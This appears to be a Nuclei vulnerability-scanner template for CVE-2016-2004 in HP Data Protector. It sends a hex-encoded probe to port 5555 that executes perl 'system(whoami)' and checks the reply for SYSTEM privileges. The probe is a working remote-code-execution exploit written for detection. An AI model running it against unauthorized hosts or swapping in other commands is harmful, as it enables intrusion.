40 lines
1.7 KiB
YAML
40 lines
1.7 KiB
YAML
id: CVE-2016-2004
|
|
|
|
info:
|
|
name: HP Data Protector - Arbitrary Command Execution
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/39858
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
|
|
- http://www.kb.cert.org/vuls/id/267328
|
|
- https://www.exploit-db.com/exploits/39858/
|
|
- http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
|
|
remediation: |
|
|
Upgrade to the most recent version of HP Data Protector.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-2004
|
|
cwe-id: CWE-306
|
|
cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
|
|
epss-score: 0.06793
|
|
metadata:
|
|
max-request: 1
|
|
product: data_protector
|
|
vendor: hp
|
|
tags: cve,cve2016,network,iot,hp,rce,edb
|
|
tcp:
|
|
- host:
|
|
- "{{Hostname}}"
|
|
port: 5555
|
|
inputs:
|
|
- data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
|
|
type: hex
|
|
matchers:
|
|
- type: word
|
|
encoding: hex
|
|
words:
|
|
- "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
|
|
# digest: 4a0a00473045022100d1c4b3e971e6f77aa7031cfdcdf219aa85600a009a9cd878f13198c648ad9ddc02204f5a98b0810b137632fada20007624adc5b433fa0ba1f593ee07faa8de914f70:922c64590222798bb761d5b6d8e72950 |